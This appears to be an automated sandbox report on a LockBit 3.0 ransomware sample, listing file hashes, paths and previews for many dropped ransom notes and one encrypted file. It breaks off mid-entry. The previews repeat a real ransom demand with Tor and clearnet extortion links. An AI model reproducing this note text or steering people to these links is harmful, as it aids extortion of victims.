                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.978572506241803
                Encrypted:false
                SSDEEP:192:KCeOX06OZTiz1jzKoisxZ54QVoIFHU9l1rpBSIMafo:KXjOz1j9xvG2pUpBSIMaw
                MD5:E4FECD1DE35458BFC184E6E5087FEAC4
                SHA1:53AF131086125AF1F369DEAC65EF89E9C8FBFCEA
                SHA-256:0F754F8FB8BB17269969634E1E3A3DC7E60DE11501899BB35379CE9B71D52E8F
                SHA-512:36C32083F5FD11CF3A9B13BEC61CAB1ACD284C2F73417724787F8933844E25F6B2899FAD51519FEC12422770BB1565E3E032485F2695EF93160F4925CD051A32
                Malicious:false
                Preview:<.o......|..M.s.....oT.z.{..g.P...6..fa..\8..j7..9...&R{j.f......'h..:.Y.......R..Z...j#....V.?=.$U.?.S.....;...8..........*...HOr..T.......K...K!.....\..j......'...y.....[....un0..M?LVD..4.ay..rl.VC.0.\..v.%........$....Ii...J.4..8nE.H.L..b...T..p.a.0W.75x.m.u1mg...V;...:(.$...Hv.u.....I....?....f..X..".Jk.X.!.."...#K...Y.WL.,....U.D.k|.I.n.V...@/...ZG...i....G}.p9..Y.....1_~.......k.Y..H.f.b...D(zI?R...EQw..h.....w...kq...'\/.k>.......QJ..].....-.N,.>...46-CF....B.....cy-...'.....l./..xc5...P..[."}M.c}....K..oC.Xa.89]rs....d.zvR.9..BA......u.j...i.Xd....=.#.......w..........k...Y EY.......^F....j-.xm.y.*MY..%......pw...H..s...g...=h..z...?!.cn.92BW&:..u...;i.=.a~>f{(KU.6.=Y..`C9.e.......G..X....c...t...M....l9.'4.?We.}.X.T.i.....~hY....yTK...H.3.q...p.+...N..Q.)..xp\8`..w.s........L53.F7.^...+...Q....L?.....#._.\e..)M3.E[Pm..DZ.......\~..b....Wn..L....".K...+......R..Z....-X.M60..yO..`.;..Qa.n.nCjIZq..Fh..&.0}nb.......i..P[..=U.

                C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
